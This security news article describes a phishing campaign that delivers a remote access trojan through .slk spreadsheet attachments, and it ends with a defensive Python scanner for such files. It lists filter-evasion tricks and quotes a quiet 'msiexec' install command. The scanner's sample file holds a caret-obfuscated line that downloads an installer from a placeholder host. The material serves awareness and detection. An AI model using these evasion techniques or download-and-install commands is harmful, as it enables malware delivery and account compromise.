New .slk attachment bypasses Microsoft 365 security, 200 million Microsoft users at risk


200 million Microsoft users at hacking risk from new malicious .slk attachments that easily bypass Microsoft 365 security

Researchers at Avanan have detected new malicious .slk attachments being sent to Microsoft 365 users that can easily bypass Microsoft 365 security. The new phishing malware puts nearly 200 million Microsoft 365 users at risk.

The Avanan researchers state that cybercriminals send an email with an .slk attachment that contains a malicious macro (an msiexec script) to download and install a remote access trojan (RAT). Earlier the hackers used to target only a few organizations, but recently the researchers have noticed a spurt in attacks on Microsoft 365 users. The rise is due to a new attack method that can easily bypass both Microsoft 365 default security (EOP) and advanced security (ATP).

The Avanan researchers say that the new method puts almost all Microsoft 365 users at risk of infection by a malware payload sent through a .slk attachment.

What is the .slk file extension?

SLK or “Symbolic Link” is an old Microsoft spreadsheet file format. It is an open-format alternative to Microsoft’s .xls or .xlsx file extensions for Excel spreadsheets. The hackers use these files because .SLK files look like an ordinary Excel spreadsheet to the average Microsoft user. Also, SLK files easily bypass Microsoft 365 security, even for accounts protected with Advanced Threat Protection.

Why are SLK files dangerous?

SLK files are more dangerous than XLS or XLSX files because Windows “Protected View” does not apply to SLK files downloaded from the Internet or received by email: Excel does not open them in read-only mode, which leaves the Office 365 user vulnerable to the payload within the SLK file.

A new campaign using SLK files

The latest SLK campaign is designed to beat the Windows Advanced Threat Protection (ATP) feature. The new phishing campaign uses a number of obfuscation techniques specifically designed to bypass ATP:

  • The attack was sent from hundreds of free Hotmail accounts.
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link.
  • The hosting server became active only after the email was sent, so it seemed benign if sandboxed by ATP.
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

The researchers say that the attacks are Microsoft Office 365 specific and Gmail immediately blocks files sent with SLK extensions.

How does the new attack work?

The latest SYLK attack includes an SLK file with an obfuscated macro to run a command on a Windows machine:

msiexec /i /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it is a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

How do you protect yourself against SLK file malware?

The researchers say that SLK attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer and use a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm asks for changes to a large electronics order, while an email to a government department will discuss legal concerns.

The only way to spot SLK extension malware is to go through the attachments before downloading them. You can also configure your Office 365 account to reject files of this type in its settings.
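As an added, defender-side example (not code from the article or from Avanan), the following Python attachment scanner flags SYLK attachments by extension or by their “ID;” header (so a renamed .slk is still caught), strips the caret obfuscation the article describes, and looks for the quiet msiexec install command. The sample attachment and the URL in it are constructed for the example.

```python
import re

# Constructed sample SYLK attachment for the example (not from the real campaign).
# A SYLK file starts with an "ID;" header record; "C;" records carry cell contents.
# The command string is caret-obfuscated the way the article describes.
SAMPLE_SLK = (
    'ID;PWXL;N;E\n'
    'C;Y1;X1;K"Invoice Q3"\n'
    'C;Y2;X1;K"m^s^ie^xec /i h^ttp://files.example.invalid/setup.msi /q"\n'
    'E\n'
)

MSIEXEC_QUIET = re.compile(r"\bmsiexec\b.*?/i\b.*?/q", re.IGNORECASE)


def is_sylk(filename, data):
    """True if the attachment is SYLK by extension or by its 'ID;' magic header."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    return ext in ("slk", "sylk") or data.lstrip().startswith("ID;")


def normalize(text):
    """Undo cmd.exe caret escaping and collapse whitespace so the real command is visible."""
    return re.sub(r"\s+", " ", text.replace("^", "")).strip()


def scan_attachment(filename, data):
    """Return sorted, de-duplicated findings for one attachment; empty list means nothing flagged."""
    findings = set()
    if not is_sylk(filename, data):
        return []
    # The article's simplest advice: SYLK attachments are worth rejecting outright.
    findings.add("sylk-attachment")
    for line in data.splitlines():
        if not line.startswith("C;"):
            continue  # only cell records can carry the macro command
        if "^" in line:
            findings.add("caret-obfuscation")
        if MSIEXEC_QUIET.search(normalize(line)):
            findings.add("msiexec-quiet-install")
    return sorted(findings)


def should_reject(findings):
    """Mail-gateway policy: reject any attachment that produced a finding."""
    return len(findings) > 0
```

Running scan_attachment on the sample returns all three findings, and the same file renamed to .txt is still flagged via the header check.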
